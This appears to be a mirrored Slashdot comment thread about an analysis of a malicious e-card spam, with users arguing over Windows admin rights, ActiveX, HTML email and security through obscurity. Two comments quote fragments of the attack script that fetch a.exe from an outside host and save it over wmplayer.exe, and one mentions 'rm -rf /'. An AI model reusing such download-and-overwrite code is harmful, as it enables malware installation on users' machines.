Slashdot Mirror
Malicious E-Cards - An Analysis of Spam
smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."
This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.
Does anyone else think that our society is overdue on becoming fed up with all these sort of things?
---
Mod me down, I'm already -1...woot!
Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.
Yes, but they do cost a person their time. Not very much, but I think it can be safely said that most e-cards are more fun to receive than normal greeting cards. And the quality of the e-card depends on how long the person has spent to pick it out.
Any one else notice that the mail is originaly from a compuserve address? I thought that the new AOL was suposed to be safe? =)
Faith_Healer -- The antethsis to almost everything, and the worlds worst speller.
...and if I was stupid enough to actually install the crapware the strange website/email/stranger gave me.
Use Evolution instead of Outlook? Bewa
1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.
Does this stuff get treated like a virus/trojan, rather than legitimate business?
If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.
It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).
People actually get pissed off when we tell them they can't have weatherbug on their computer.
I've had enough abrasive sigs. Kittens are cute and fuzzy.
The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?
Not trolling, just asking an honest question here.
Stop by my site where I write about ERP systems & more
1. Clicking can be dangerous.
2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.
Bite my shiny metal... oops... Nevermind!
It's an easy way to protect yourself from all sorts of stupid stuff.
Ahem, turn off HTML viewing in your email client NOW.
Here's what I do: Bitty Browser & Andromeda
This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.
http://www.questionablecontent.net
I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:
- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)
Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.
How can email on the internet remain free/cheap and still not allow spam to run rampant?
http://github.com/gbook/nidb
Huh, so what if you are running has admin, why would I want a web page to overwrite .exe files without asking permission? In the race to keep up with Java some very unsafe things were done with ActiveX...
Onward to the Aether Sphere!
This looks pretty ugly:
.. ever </Comic book guy>
x.Open("GET", "http://adversting.co.uk/a.exe",0);
and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea
Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.
My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.
Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.
for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.
Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.
The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.
Remember "security through obscurity"? Well, the reverse applies, too.
Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't upgrade the machines (933mhz systems) to anything higher than Win98. Come to think of it, it's somewhat of a miracle that I can even remote into my system at all from there.
"So after all this, you make my case for me. To end this stalemate, you must die..."
As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.
I agree with your statement, but many of the windows based line of business applications out there "require" administrative privileges to run properly, forcing users to have administrative permissions. This is also an issue that I have not seen people thinking about lately.
And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.
Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch to a normal user in a blink..
"/Dread"
Switching between user levels on windows isn't as simple as it is on a *nix machine. The time/memory overhead switching would send me crazy.
Okay, run as a Regular User under Win XP.
Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.
Wheee!
Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.
Actually, at one in time (DotCom boom maybe?, remember "Active Desktop", the whole point of "portals") the browser was SUPPOSED to do anything and everything. Your browser was supposed to be your desktop and that's how you'd do stuff.
That was the point of a "home page", you could get your news and start up Word all on the same page.
When modding "Informative", please make sure it both has a source and IS actually informative.
As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.
Of course, it could be pointed out that this is true for any piece of software.
It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD box is not secure either.
I think the real answer to the Original Poster's question is "Probably not." It seems to me that 99% of viruses use public, well known exploits to compromise unpatched systems. It seem to be a much rarer occurance where some black hat out there discovers the exploit and crafts a successful worm/virus/whatever around it.
They are spam harvesters. Nothing more.
I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.
Do I need to attach a note to my emails?
What possesses people to do it?
Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...
Bastards.
"The same thing can happen to an idiot running Mozilla under Linux as root,"
Except:
a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.
b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.
c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.
Those are just three reasons why most people run as Administrator on Windows and don't on Linux.
You seem to be missing the point. Browsers shouldn't allow this:
( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile
etc...
This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but thats not an excuse for IE's pisspoor security.
# fuser -v
#
Security through obscurity never works
Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazzaa returns 0 results. Security through obscurity worked in this example.
Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.
I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.
Like woodworking? Build your own picture frames.
Another flaw: i get to check "always trust Hackerboy" box, but there is no "never trust Hackerboy" box for me to check. Would work wonders on my blood pressure...
You're not old until regret takes the place of your dreams.
I agree the users are a big problem, but the technology is horrible too, not just in Windows but all OSes. The Mac is the only system that balances the user's need to accomplish things with the protection to not do something catastrophic. It doesn't do this through tons of "Are you sure..." dialog boxes, or with Orwellian security routines, and not even through add-on programs which check up on viruses and backups.
The Mac simply has a user interface that allows you to do the things you want to do. It sounds simple, but most Mac users don't ever get to the point of confusion where they might do something stupid. The terminal isn't right there on the desktop, it's not even in the Applications folder. It's in a folder called Utilities. The Windows folder is such a generic name, it's a likely candidate to be "cleaned out" by a curious user. On the Mac it's called System which has an obvious connotation that it's important to running your computer. I could go on and on.
The interface of the machine is the easiest way to educate users. Make it intuitive and even a novice is going to play safe.
I was analyzing something very similar around October of last year when I worked here. They probably aren't installing a virus, per se -- more like an autoproxy which they will use to send spam or install more malware (e.g., to steal passwords or credit card numbers).
All the vulnerabilities mentioned in the article have been known for quite some time. Liu Die Yu's Unpatched IE vulnerabilities page documents several of these in detail, with exploit examples. (Note that some of the links on Liu Die Yu's site may result in popups, ironically.)
When I took a look at it, the proxy flavor of the month was most commonly referred to as ap216.exe the filename is irrelevant, obviously). A good description of it is here, in the context of its use in a phishing scam.
Note that everything done in this attack will blithely go through most firewalls -- almost all connections are initiated from within the network. Firewalls are an increasingly inadequate means of protecting users from organized and motivated attackers. IMO, any network admin who doesn't run deep-packet inspection firewalls, intrusion prevention, or security-minded filtering application proxies is asking for it.
Sure, someone could write something to quietly delete all the files on your hard drive. I'm sure he'd rather have all the spam your machine can send, or all the money from your bank account.
phil
Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is problem a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.
So the solution to stupid system design is rewarding stupid system designer by buying a new version?!? No sane person would do that for a car! I am certain nobody would have bought a Pinto II because the Pinto was "supported no more and it is their fault they still drive an exploding car because the new version is all right".
You're not old until regret takes the place of your dreams.
You know, that kind of assymetry shows up a few places in Windows, and it's always annoying.
Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"
Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...
SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
You could just simply not view messages from people you don't know.
Otherwise known as a white list.
Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.
And this is the real bad effect that SPAM has created. We no longer trust strangers.
Sigh...
- - - - - - - - - - -
I am a programmer. I am paid to produce syntax not grammar. Deal with it.
the buddylinks spyware that the OP refers to actually pops up a box, complete with a link to a EULA, to accept or stop the install.
The text of the EULA lists all the stuff that it does - send ads out to other people on your buddy list with no action on your part. And yet people agreed to it. And in general, shrink wrap/click wrap licenses have been held as legal.
The problem is once again human nature - people are used to clicking yes on those boxes because they were originally for stuff you actually needed to view a webpage (Windows Update, shockwave and flash plugins, ect). People don't bother reading them, just click yes, and wind up installing toolbars, gator, weatherbug, bonzibuddy, and the rest of that crap.
I have blog like everyone else
If you've never heard of a Linux or Unix program or script being compromised, you lead a sheltered life. So you review the source from start to finish before you complile and only run binaries from a trusted source...which of course could never be compromised. Great.
And I know that it's impossible to find any flaws in Linux based software that could be taken advantage of by someone of ill intent. But I'm not sure that the malicious coders recognize that as truth.
But as the user bases grows there are more and more users who arent as cautious as you. And, as the user base grows, there will be more of those sick fscks looking to cause you harm.
. Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
Sorry, I'm a bit confused. Please tell me how a mail program that only deals with plain text can be compromised? When you've done that then tell
me how a binary will get run without me knowing it via email. And after that explain why I would be dumb enough to run ANY executable from an unknown source
that had not been suitably verified first and even then why exactly would I run then as root user so they could do some serious harm without testing it in a chroot jail first?
I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.
...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. Then real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.
But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.
Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.
It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.
They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.
But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.
So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.
Kjella
Live today, because you never know what tomorrow brings
First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.
I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.
Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.
You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.
Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?
. Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
I get the occasional email from strangers or people I don't normally communicate with via email. For instance, someone from Usenet or a mailing list might email me. I'd hate to miss any one of those. I think it is reasonable to tell people not to open strange attachments, but it isn't reasonable to suggest that people don't even open an email from a stranger. That is just paranoid and unnecessary with reasonable measures taken. Turning off the stupid HTML "feature," don't open strange attachments, run a Bayseian SPAM filter,and everything should be just fine.
-matthew
"THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
Nothing else. All the other troubles are due to the execution of scripts. If the various graphical email programs would just stick to rendering html and leave javascript and others untouched then there would be no email-virusses. (well except for the ones launched through buffer overflows)
So it would only require a little bit of thought to give people the "nice" look off html email without the security problems. Prohibit external links and only allow links to attached files (wich since they are links without script can't be executed until the viewer clicks them) and you will even remove the privacy invasion. All the attractiveness of the web without the insecurity.
Given all that why exactly was the execution of code added to email? There must have been a decission made at MS at sometime but anyone ever see the reasons for it?
Oh and don't get me wrong. I hate html formatted emails since they are pain to read on remote shell. Sadly I am a linux geek and everyone else seems to disagree. No other slashdotters do not matter, you are geeks too.
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
A lot of people are blaming this on allowing HTML in email, but the fact is that HTML is a *STATIC* language... it can't - or at least shouldn't be able to - hurt your PC.
Now, by either having a parse exploit with the HTML (bad client coding), or allowing scripts (really poor security) then problems arise...
Personally, I dumped Outlook a loooong time ago. Thunderbird is nice and not hard for most users to switch to, my primary beef is that it doesn't seem to have an option to block images but allow by sender/site - or to allow a particular message to be clicked to show images (some catalogues I get via subscription in my email have images I want to see)
There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.
:)
Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).
And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".
Crap, now I gotta go find another story to spend my mod points on
~REZ~ #43301. Who'd fake being me anyway?